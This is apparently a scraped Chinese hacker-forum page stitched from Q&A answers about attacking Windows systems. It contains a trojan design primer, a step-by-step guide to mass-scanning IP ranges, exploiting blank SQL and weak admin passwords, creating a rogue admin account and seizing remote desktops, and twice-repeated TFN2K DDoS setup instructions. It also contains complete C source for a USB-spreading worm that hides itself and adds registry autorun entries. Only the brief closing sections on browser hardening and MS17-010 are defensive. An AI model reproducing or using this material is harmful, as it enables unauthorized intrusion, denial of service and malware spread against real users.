攻击所有windows软件,软件攻击器

作者:hacker 分类:网站入侵 时间:2022-07-16 21:26:26 浏览:146

内容导读:导航目录:1、如何抓黑客侵入Windows系统2、黑客如何DDOS攻击Windows系统3、windows7如何防止浏览器被恶意软件攻击4、编程实现windows系统的攻击5、有没有可以攻击windowsXP系...……

导航目录:

如何抓黑客侵入Windows系统

黑客通常是不用软件的形式进行攻击的。

解释:黑客一般直接编写命令程序或者通过命令直接攻击。

备注:如果用户都知道软件木马的话,都下载攻击别人电脑,这个是难以控制的。计算机木马 一个完整的木马系统由硬件部分,软件部分和具体连接部分组成。 (1)硬件部分:建立木马连接所必须的硬件实体。控制端:对服务端进行远程控制的一方。 服务端:被控制端远程控制的一方。 INTERNET:控制端对服务端进行远程控制,数据传输的 *** 载体。 (2)软件部分:实现远程控制所必须的软件程序。控制端程序:控制端用以远程控制服务端的程序。 木马程序:潜入服务端内部,获取其操作权限的程序。 木马配置程序:设置木马程序的端口号,触发条件,木马名称等,使其在服务端藏得更隐蔽的程序。 (3)具体连接部分:通过INTERNET在服务端和控制端之间建立一条木马通道所必须的元素。 控制端IP,服务端IP:即控制端,服务端的 *** 地址,也是木马进行数据传输的目的地。 控制端端口,木马端口:即控制端,服务端的数据入口,通过这个入口,数据可直达控制端程序或木马 程序。 用木马这种黑客工具进行 *** 入侵,从过程上看大致可分为六步(具体可见下图),下面我们就按这六步来详细阐述木马的攻击原理。 一.配置木马 一般来说一个设计成熟的木马都有木马配置程序,从具体的配置内容看,主要是为了实现以下两方 面功能: (1)木马伪装:木马配置程序为了在服务端尽可能的好的隐藏木马,会采用多种伪装手段,如修改图标 ,捆绑文件,定制端口,自我销毁等,我们将在“传播木马”这一节中详细介绍。 (2)信息反馈:木马配置程序将就信息反馈的方式或地址进行设置,如设置信息反馈的邮件地址,IRC号 ,ICQ号等等,具体的我们将在“信息反馈”这一节中详细介绍。 【二、传播木马】 (1)传播方式: 木马的传播方式主要有两种:一种是通过E-MAIL,控制端将木马程序以附件的形式夹在邮件中发送出去,收信人只要打开附件系统就会感染木马;另一种是软件下载,一些非正规的网站以提供软件下载为名义,将木马捆绑在软件安装程序上,下载后,只要一运行这些程序,木马就会自动安装。 (2)伪装方式: 鉴于木马的危害性,很多人对木马知识还是有一定了解的,这对木马的传播起了一定的抑 *** 用,这 是木马设计者所不愿见到的,因此他们开发了多种功能来伪装木马,以达到降低用户警觉,欺骗用户的目的。 (一)修改图标 当你在E-MAIL的附件中看到这个图标时,是否会认为这是个文本文件呢?但是我不得不告 诉你,这也有可能是个木马程序,现在 已经有木马可以将木马服务端程序的图标改成HTML,TXT, ZIP等各种文件的图标,这有相当大的迷 惑性,但是目前提供这种功能的木马还不多见,并且这种 伪装也不是无懈可击的,所以不必整天提心吊胆,疑神疑鬼的。 (二)捆绑文件 这种伪装手段是将木马捆绑到一个安装程序上,当安装程序运行时,木马在用户毫无察觉的情况下,偷偷的进入了系统。至于被捆绑的文件一般是可执行文件(即EXE,COM一类的文件)。 (三)出错显示 有一定木马知识的人都知道,如果打开一个文件,没有任何反应,这很可能就是个木马程序,木马的设计者也意识到了这个缺陷,所以已经有木马提供了一个叫做出错显示的功能。当服务端用户打开木马程序时,会弹出一个错误提示框(这当然是假的),错误内容可自由 定义,大多会定制成 一些诸如“文件已破坏,无法打开的!”之类的信息,当服务端用户信以 为真时,木马却悄悄侵入了系统。 (四)定制端口 (五)自我销毁 这项功能是为了弥补木马的一个缺陷。我们知道当服务端用户打开含有木马的文件后,木马会将自己拷贝到WINDOWS的系统文件夹中(C:WINDOWS或C:WINDOWSSYSTEM目录下),一般来说 原木马文件 和系统文件夹中的木马文件的大小是一样的(捆绑文件的木马除外),那么中了木马 的朋友只要在近来 收到的信件和下载的软件中找到原木马文件,然后根据原木马的大小去系统 文件夹找相同大小的文件, 判断一下哪个是木马就行了。而木马的自我销毁功能是指安装完木马后,原木马文件将自动销毁,这样服务端用户就很难找到木马的来源,在没有查杀木马的工 具帮助下,就很难删除木马了。傻瓜级入侵

之所以说这是傻瓜级,因为这个 *** 完全不用动脑子,并且保守的说,照这个 *** ,两个小时内肯定至少能入侵3台电脑!3台绝对是保守的数目!

需要软件:WinntAutoAttack (版本:V2.0) Remote Administrator v2.0(简称RA) 3389登陆器(xp自带的有,要是xp,就不要下载了,就是"开始"-"所有程序"-"附件"-"通讯"-"远程桌面连接"

不知道在哪下?用百度搜!我最不喜欢的就是当在群里我告诉别人用什么软件后,他还喋喋不休的问我"在哪下?把地址给我吧",太懒了吧,难道下载地址在我脑子里?我不也是要搜吗?

好了,下边我们开始入侵了,下边就是过程:

之一步. 打开WinntAutoAttack,就是那个手雷的标志,在"起始ip"里和"目标ip"里填上一个ip段,并且尽量把范围搞大点,比如在"起始ip"里填"218.88.1.1",在"目标ip"里填"218.88.255.255".ip段建议下一个显ip的qq,参考你qq上好友的ip去填.中奖概率更大!勾上"仅对ping检查成功的机器进行检测","检测3389端口"和"收集netbios信息"

在"IIS溢出"选项卡里勾上"开99端口shell",这个是用来开99端口telnet的,要是你不会用telnet,这个就不要勾了. 在"简单管理员密码"选项卡里勾上"列出所有密码简单的管理帐号"和"上传并安装远程图形控制软件". 在"sql漏洞"选项卡里也一样,就是把三个框都打上勾,就是"列出密码为空的sa帐号""建立系统管理员帐号(shanlu)"和"上传并安装远程图形控制软件".

好了,连上网(你不会连网都没连吧?)根据你机器的性能,把线程调下,就是拖那个小滑块,越往右线程越大,要是你的机器性能不好,太大的线程会死机的!我的机器性能不错,我才用110左右的线程,并且有的时候我也会死机... ...(哭... ...)

ok!一切就绪!点"开始" . 接下来,接下来我们干什么呢?在qq上聊天吧,等结果吧

第二步. 时间很快就过去了,过了半个小时了吧,我们看看有没有什么结果,点"信息",把上边的"废话框"内容往下拉

主机:218.88.55.55

3389,Windows 2000 Advance Server Terminal 端口开放。

SQL漏洞:

sa帐号密码为空。

建立系统管理员帐号shanlu()成功

哈哈,有肉鸡了,这个是3389的肉鸡,我们用3389的登陆器登陆上去,填上他的ip,用户名是shanlu,密码是空,他的机器就展现在我们面前了!

要是有这样的提示:

主机:218.88.55.55

3389,Windows 2000 Advance Server Terminal 端口开放。

简单管理员密码:

帐号:

TsInternetUser(1234567890)[Administrators]

就说明用户名是TsInternetUser,密码是1234567890,要是括号里什么都没有,就说明密码是空,也就是说括号里的是密码,前边的是用户名.注意,帐户必须要是管理员的帐户,否则登陆不上去!"[Administrators]"告诉我们这是个管理员帐户.

要是有主机提示开了4899端口或提示"安装远程图形控制软件成功",我们就可以用Remote Administrator了!(Remote Administrator需要安装,强烈建议安装后把服务端卸载掉, *** :开始-运行,在"运行"框里填"winnt\system32\re_server.exe /uninstall",注意是"winnt"还是"windows"就看你的机器系统文件夹是什么了)卸载成功了会弹个对话框出来,说"removed successfully"要是你不卸载,最少也要在安装后给服务端装个密码,因为RA本来不是一个黑客工具,他是一个很方便的远程帮助的工具,甚至比windows自带的远程帮助工具用着还要舒服,可是,它同时也很象一个木马,有客户端和服务端,所以你要不把服务端卸载或加密码的话,很可能"螳螂捕蝉,黄鹊在后"你就成为别人攻击的目标了.

打开ra的客户端,也就是那个带红色"R"的图标,(蓝色的是服务端,不要点)提示要输注册码,一般这个下载的同时在"readme"文件里都能找到,要是找不到,我给你们一个:08le-2jgMggTuKc8bRD8VVC4O9107Hz1p7qkNUBRsGES4OdBDAnftk+ki2pQZHmM7lhys

VBux8HE7udeSR0D1E0

长吧哈哈,然后把那个勾勾上,那个勾的意思是下次不再出现这个窗口(都是乱码,晕~~)

进入了RA的主界面,我们点"add new connection to the list"(建立新连接)在弹出来的窗口的两个框上都填上刚才开了4899或安装图形控制软件成功的机器的ip,点ok,看下边多出来一个小电脑的图标没?双击进去,看见什么了?是不是看见人家的屏幕了?人家在干什么你都看的清清楚楚吧哈哈!

慢!!!你干什么,别乱动他的屏幕!先看看你用的是什么模式进去的!我来给大家介绍下上边的13个按纽的作用,我就给大家介绍其中的7个常用的吧.

第2个按纽,刚才我们用过了,就是添加主机按纽

第3个按纽,删除主机

第5个按纽(中间的之一个):这个按纽最厉害!先点这个,再双击你下边肉鸡的图标进去,你不但能看见肉鸡的屏幕,还能完完全全控制他的机器!!,不信,你双击他桌面上的图标试!!或者把他正在开的窗口关了!(我怎么这么坏?)是不是就和用自己电脑一样?哈!刚开始的时候你可能不习惯这种控制,慢慢的你就会习惯了.可是,用这个要小心啊,因为你控制他电脑的动作,只要你的肉鸡前有人,他就会发现,聪明一点的,他就立即下线了,而现在的肉鸡大部分都是浮动ip,好,你这个肉鸡白找了,还没玩过瘾就没有了...

第6个按纽:只能看见屏幕,但不能控制他的电脑,适合观察他机器的动静,比如猜猜看他机器前现在有没有人啊

第7个按纽:另类的telnet功能,你用这个模式进去后,看见的就和cmd下差不多,你可以在这个下边给你的这个肉鸡加个密码,这样后来的入侵者就进不去了(当然高手还是能进去,不过他肯定要利用其他漏洞了),并且你还可以在下边做你想做的一切!

第8个按纽,进入文件夹模式.上边的是你机器的文件夹,下边的当然是他的了,你可以在这里把你机器里的木马传到他机器上,当然你要是发现他机器上有什么你想要的,也可以下下来,并且一切都在神不知鬼不觉当中(贼??)具体的做法?一个字:拖!把你的文件

黑客如何DDOS攻击Windows系统

【IT168

黑客攻防】首先说我们用来攻击的客户机和服务器的配置 *** ,使用当下最有名的REDHAT

LINUX进行测试,本次攻击测试我使用的是FEDORA

CORE3

,软件用的是最有名的DDOS攻击工具TFN2K

LINUX版,被攻击的WINDOWS服务器系统使用的是WINDOWS2000SERVER

服务开有APACHE2

FTP

VNC关系不大,主要攻击APACHE

废话不说了,开始设置服务器.

0.解压

tar

-zxvf

tfn2k.tgz

1.安装TFN2K

TFN2K为开放原代码的软件,所以需要我们进行编译,这个不用说了,编译应该都会的吧,但有几个地方是必需注意的,因为使用不同版本和厂商的LINUX需要不同的设置。

/*struct

in_addr

{

unsigned

long

int

s_addr;

};*/

然后make进行编译

编译时会提示你输入服务器端进行密码设置8-32位,(攻击的时候需要输入密码)编译后会出现两个新的执行文件td

tfn,其中td是守护进程,也是客户机的使用进程。最后在所有的客户机中安装并运行td(需要ROOT权限),并且在服务器上建立一个文本文件,文件中记录所有的客户机IP地址(用VI编辑一个就可行了),格式为:

192.168.0.1

192.168.0.2

192.168.0.3

IP

IP

.....

然后在主服务器上运行./tfn

windows7如何防止浏览器被恶意软件攻击

1、在Win7系统开始菜单上,点击运行对话框;

2、在运行窗口中输入gpedit.msc命令并按下回车键,即可打开本地组策略编辑器;

3、在本地组策略编辑器上,从左侧导航栏中依次展“开

计算机配置”-“管理模板”、“Windows组件”-“Internet

Explorer”-“安全功能”-“限制文件下载”;

4、在右侧窗格中双击打开Internet

Explorer进程;

5、在打开的窗口上,选择“已启用”,再点击确定按钮保存即可。

windows7系统防止浏览器网页被恶意软件攻击的 *** 讲解到这里了,为了系统安全我们可以提前设置防止网页被恶意软件攻击,一款简单实用的 *** 。

编程实现windows系统的攻击

我这有一个c病毒源代码,或许对你有帮助

#include windows.h

#include Shlwapi.h

#include fstream.h

#include TlHelp32.h

#include Dbt.h

#pragma comment(lib,"shlwapi.lib")

#define TIMER 1//计时器

//function

LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);//窗口过程

//获取盘符

TCHAR FirstDriveFromMask (ULONG unitmask);

//病毒从U盘启动时用到的函数

BOOL FileExist(TCHAR *path);//测试一个文件是否存在

BOOL GetSelfPath(TCHAR *path);//Get the virus's path

//BOOL FindU(TCHAR *u);//check whether u exist, u[2]

BOOL GetSysPath(TCHAR *path);//得到系统路径

BOOL CopyToSysAndSet(HWND hwnd);//复制自身到系统目录和设置

BOOL SetFileAttrib(TCHAR *path);//设置path所指文件的属性

BOOL RegAutoRun(TCHAR *path);//修改注册表,实现自启动

//从C盘启动时用到函数

BOOL CopyToUAndSet();//复制自己到U盘

BOOL CreateAutoRunFile(TCHAR *path);//在U盘下生成autorun.inf文件

BOOL FindSelf();//测试自己是否在已经执行了

//global variable

TCHAR szExePath[MAX_PATH];//the virus's path

TCHAR U[2];//保存U盘的盘符

TCHAR szSysPath[MAX_PATH];//system path

//constant

const TCHAR *szExeName="bbbbb.exe";

const TCHAR *szSysName="aaaaa.exe";

const TCHAR *szAutoRunFile="AutoRun.inf";

int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance,

PSTR szCmdLine, int iCmdShow)

{

static TCHAR szAppName[]=TEXT ("UUUUUU");

HWND hwnd;

MSG msg;

WNDCLASS wndclass;

wndclass.style =0;

wndclass.lpfnWndProc =WndProc;

wndclass.cbClsExtra =0;

wndclass.cbWndExtra =0;

wndclass.hInstance =hInstance;

wndclass.hIcon =0;

wndclass.hCursor =0;

wndclass.hbrBackground =0;

wndclass.lpszMenuName =NULL;

wndclass.lpszClassName =szAppName;

if (!RegisterClass (wndclass))

{

MessageBox (NULL,TEXT("Program requires Windows NT!"),

szAppName, MB_ICONERROR);

return 0;

}

hwnd = CreateWindow (szAppName, NULL,

WS_DISABLED,

0, 0,

0, 0,

NULL, NULL, hInstance, NULL);

while (GetMessage(msg, NULL, 0, 0))

{

TranslateMessage (msg);

DispatchMessage (msg);

}

return msg.wParam;

}

LRESULT OnDeviceChange(HWND hwnd,WPARAM wParam, LPARAM lParam)

{

PDEV_BROADCAST_HDR lpdb = (PDEV_BROADCAST_HDR)lParam;

switch(wParam)

{

case D *** _DEVICEARRIVAL: //插入

if (lpdb - dbch_devicetype == D *** _DEVTYP_VOLUME)

{

PDEV_BROADCAST_VOLUME lpdbv = (PDEV_BROADCAST_VOLUME)lpdb;

U[0]=FirstDriveFromMask(lpdbv -dbcv_unitmask);//得到u盘盘符

//MessageBox(0,U,"Notice!",MB_OK);

CopyToUAndSet();//拷到u盘

}

break;

case D *** _DEVICEREMOVECOMPLETE: //设备删除

break;

}

return LRESULT();

}

LRESULT CALLBACK WndProc (HWND hwnd, UINT message, WPARAM wParam,LPARAM lParam)

{

switch(message)

{

case WM_Create: //处理一些要下面要用到的全局变量

U[1]=':';

GetSysPath(szSysPath);//得到系统路径

SetTimer(hwnd,TIMER,5000,0);//启动计时器

GetSelfPath(szExePath);//得到自身的路径

return 0;

case WM_TIMER: //timer message

if(szExePath[0]==szSysPath[0]) //如果是系统盘启动的

SendMessage(hwnd,WM_DEVICECHANGE,0,0);//检测有没有插入设备消息

else

{

CopyToSysAndSet(hwnd);//拷到系统盘并自启动

}

return 0;

case WM_DEVICECHANGE:

OnDeviceChange(hwnd,wParam,lParam);

return 0;

case WM_DESTROY:

KillTimer(hwnd,TIMER);

PostQuitMessage(0);

return 0;

}

return DefWindowProc(hwnd, message, wParam, lParam);

}

TCHAR FirstDriveFromMask(ULONG unitmask)

{

char i;

for (i = 0; i 26; ++i)

{

if (unitmask 0x1)//看该驱动器的状态是否发生了变化

break;

unitmask = unitmask 1;

}

return (i + 'A');

}

BOOL GetSelfPath(TCHAR *path)

{

if(GetModuleFileName(NULL,path,MAX_PATH))//得到程序自身的目录

{

return TRUE;

}

else

return FALSE;

}

BOOL GetSysPath(TCHAR *path)

{

return GetSystemDirectory(path,MAX_PATH);//得到系统路径

}

BOOL CopyToSysAndSet(HWND hwnd)

{

TCHAR szPath[MAX_PATH];

lstrcpy(szPath,szSysPath);

lstrcat(szPath,"\\");

lstrcat(szPath,szSysName);//得到复制到系统目录的完整目录

if(!FileExist(szPath))//检测系统目录是否已经存在复制的文件

{

CopyFile(szExePath,szPath,FALSE);

RegAutoRun(szPath);

return SetFileAttrib(szPath);

}

else

{

if(!FindSelf())//检测自己有没有运行

{

//MessageBox(0,szExePath,szPath,MB_OK);

WinExec(szPath,SW_HIDE);//没有就执行

SendMessage(hwnd,WM_CLOSE,0,0);//结束自己

}

}

return FALSE;

}

BOOL FileExist(TCHAR *path)//检测PATH所指的路径的文件是否存在

{

int result;

result=PathFileExists(path);

if(result==1)

return TRUE;

else

return FALSE;

}

BOOL SetFileAttrib(TCHAR *path)

{

return SetFileAttributes(path,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);

}

BOOL RegAutoRun(TCHAR *path)//修改注册表实现自启动

{

HKEY hkey;

DWORD v=0;

RegOpenKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",hkey);

RegSetValueEx(hkey,"NoDriveTypeAutoRun",0,REG_DWORD,(LPBYTE)v,sizeof(DWORD));

if(RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Run",

hkey)==ERROR_SUCCESS)

{

RegSetValueEx(hkey,szSysName,0,REG_SZ,(BYTE*)path,lstrlen(path));

RegCloseKey(hkey);

return TRUE;

}

else

return FALSE;

}

BOOL CopyToUAndSet()

{

TCHAR szPath[MAX_PATH];

lstrcpy(szPath,U);

lstrcat(szPath,"\\");

lstrcat(szPath,szExeName);//得到指向U盘的完整目录

TCHAR szAutoFile[MAX_PATH];

lstrcpy(szAutoFile,U);

lstrcat(szAutoFile,"\\");

lstrcat(szAutoFile,szAutoRunFile);

if(!FileExist(szAutoFile))

{

CreateAutoRunFile(szAutoFile);

SetFileAttrib(szAutoFile);

}

if(!FileExist(szPath))

{

CopyFile(szExePath,szPath,FALSE);

return SetFileAttrib(szPath);

}

return FALSE;

}

BOOL CreateAutoRunFile(TCHAR *path) //在U盘下创建一个autorun.inf文件

{

ofstream fout;

fout.open(path);

if(fout)

{

fout"[AutoRun]"endl;

fout"open="szExeName" e"endl;

fout"shellexecute="szExeName" e"endl;

fout"shell\\Auto\\command="szExeName" e"endl;

fout"shell=Auto"endl;

fout.close();

return TRUE;

}

return FALSE;

}

BOOL FindSelf(){

PROCESSENTRY32 pe;

HANDLE hShot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

pe.dwSize=sizeof(PROCESSENTRY32);

if(Process32First(hShot,pe)){

do{

if(lstrcmp(pe.szExeFile,szSysName)==0)

{

CloseHandle(hShot);

return TRUE;

}

}while(Process32Next(hShot,pe));

}

CloseHandle(hShot);

return FALSE;

}

有没有可以攻击windows XP 系统的攻击软件

朋友您好!可以采用DDOS攻击。

首先说我们用来攻击的客户机和服务器的配置 *** ,使用当下最有名的REDHAT

LINUX进行测试,本次攻击测试我使用的是FEDORA

CORE3

,软件用的是最有名的DDOS攻击工具TFN2K

LINUX版,被攻击的WINDOWS服务器系统使用的是WINDOWS2000SERVER

服务开有APACHE2

FTP

VNC关系不大,主要攻击APACHE

废话不说了,开始设置服务器.

0.解压

tar

-zxvf

tfn2k.tgz

1.安装TFN2K

TFN2K为开放原代码的软件,所以需要我们进行编译,这个不用说了,编译应该都会的吧,但有几个地方是必需注意的,因为使用不同版本和厂商的LINUX需要不同的设置。

先修改src/ip.h

注释掉以下部分,否则编译出错。

/*struct

in_addr

 {

unsigned

long

int

s_addr;

};*/

然后make进行编译

编译时会提示你输入服务器端进行密码设置8-32位,(攻击的时候需要输入密码)编译后会出现两个新的执行文件td

tfn,其中td是守护进程,也是客户机的使用进程。而tfn是服务器控制进程,如果想攻击别人就必需先起动td这个进程,然后再运行服务器进程,否则攻击无效,更改密码可以执行mkpass进行更改。最后在所有的客户机中安装并运行td(需要ROOT权限),并且在服务器上建立一个文本文件,文件中记录所有的客户机IP地址(用VI编辑一个就可行了),格式为:

192.168.0.1

192.168.0.2

192.168.0.3

IP

IP

.....

然后在主服务器上运行./tfn

以上办法仅供交流讨论。祝您愉快!!!

windows10系统被ms17-010攻击了吗

Windows10不能完全防止遭受wana系列勒索病毒攻击。

wanacry勒索病毒类似于其他勒索性质的蠕虫病毒,但wanacry利用Windows-445系列端口漏洞MS17-010,攻击范围覆盖所有Windows操作系统(包括Windows10)

目前wana系列病毒已经被一定程度上控制,请广大Windows用户不要惊慌,理性对抗,及时更新安全补丁和杀毒软件,近期避免访问高危网页即可。

注意:若同一局域网/IP内有任意一台设备中毒,则需在断开所有 *** 连接的情况下开启其他机器。